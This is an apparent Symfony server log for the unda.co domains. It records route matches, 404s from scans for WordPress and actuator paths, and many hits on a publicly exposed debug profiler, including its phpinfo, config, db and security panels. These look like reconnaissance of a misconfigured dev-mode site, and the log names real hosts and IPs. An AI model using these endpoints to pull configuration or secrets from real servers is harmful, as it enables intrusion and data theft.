[2025-12-19 14:35:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 14:35:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 14:39:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=twig","method":"GET"} []
[2025-12-19 14:39:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 14:40:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b11cf0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b11cf0?panel=twig","method":"GET"} []
[2025-12-19 14:40:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 14:44:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-19 14:44:34] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a4593d","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/a4593d","method":"GET"} []
[2025-12-19 14:44:34] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 14:47:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=request","method":"GET"} []
[2025-12-19 14:47:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 14:55:44] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 14:56:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d","method":"GET"} []
[2025-12-19 14:56:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 15:04:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=twig","method":"GET"} []
[2025-12-19 15:04:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 15:11:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=twig","method":"GET"} []
[2025-12-19 15:11:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 15:17:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 15:21:44] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 15:29:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21?panel=dump","method":"GET"} []
[2025-12-19 15:29:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 15:40:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=time","method":"GET"} []
[2025-12-19 15:40:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 15:40:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
[2025-12-19 15:40:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-19 15:41:28] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"c205f4","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/c205f4/search/results?ip=185.244.104.2&limit=10","method":"GET"} []
[2025-12-19 15:41:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=185.244.104.2&limit=10","method":"GET"} []
[2025-12-19 15:45:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=db","method":"GET"} []
[2025-12-19 15:45:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 15:49:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"a9b5f2","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/a9b5f2/search/results?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
[2025-12-19 15:49:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
[2025-12-19 15:54:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 15:55:01] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"f3bb11","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/f3bb11","method":"GET"} []
[2025-12-19 15:56:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b1d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e96b1d?panel=time","method":"GET"} []
[2025-12-19 15:56:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 15:56:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=security","method":"GET"} []
[2025-12-19 15:56:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 16:00:04] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 16:06:37] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 16:06:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 16:12:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 16:13:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=request","method":"GET"} []
[2025-12-19 16:13:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 16:13:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 16:15:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c","method":"GET"} []
[2025-12-19 16:15:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 16:16:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2705d1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2705d1?panel=swiftmailer","method":"GET"} []
[2025-12-19 16:16:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 16:26:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 16:26:58] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-19 16:29:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=twig","method":"GET"} []
[2025-12-19 16:29:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 16:32:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 16:39:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=security","method":"GET"} []
[2025-12-19 16:39:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 16:44:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=time","method":"GET"} []
[2025-12-19 16:44:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 16:49:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 17:00:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=security","method":"GET"} []
[2025-12-19 17:00:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 17:05:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/health"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/health\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 17:06:39] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 17:17:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=request","method":"GET"} []
[2025-12-19 17:17:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 17:20:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f58fba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f58fba?panel=logger","method":"GET"} []
[2025-12-19 17:20:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 17:29:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=request","method":"GET"} []
[2025-12-19 17:29:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 17:30:43] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-19 17:31:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 17:31:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"501509","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/501509","method":"GET"} []
[2025-12-19 17:31:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 17:36:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1702ec","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/1702ec?panel=form","method":"GET"} []
[2025-12-19 17:36:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 17:38:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"812b29","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/812b29?panel=request","method":"GET"} []
[2025-12-19 17:38:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 17:42:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8b8345","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8b8345?panel=validator","method":"GET"} []
[2025-12-19 17:42:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-19 17:55:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=db","method":"GET"} []
[2025-12-19 17:55:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 17:57:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 18:03:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0): at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
[2025-12-19 18:03:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 18:05:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d2c58d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d2c58d?panel=dump","method":"GET"} []
[2025-12-19 18:05:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 18:06:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"259531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/259531?group=1&panel=db","method":"GET"} []
[2025-12-19 18:06:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-19 18:07:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=config","method":"GET"} []
[2025-12-19 18:07:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 18:11:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 18:19:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 18:20:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 18:23:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=security","method":"GET"} []
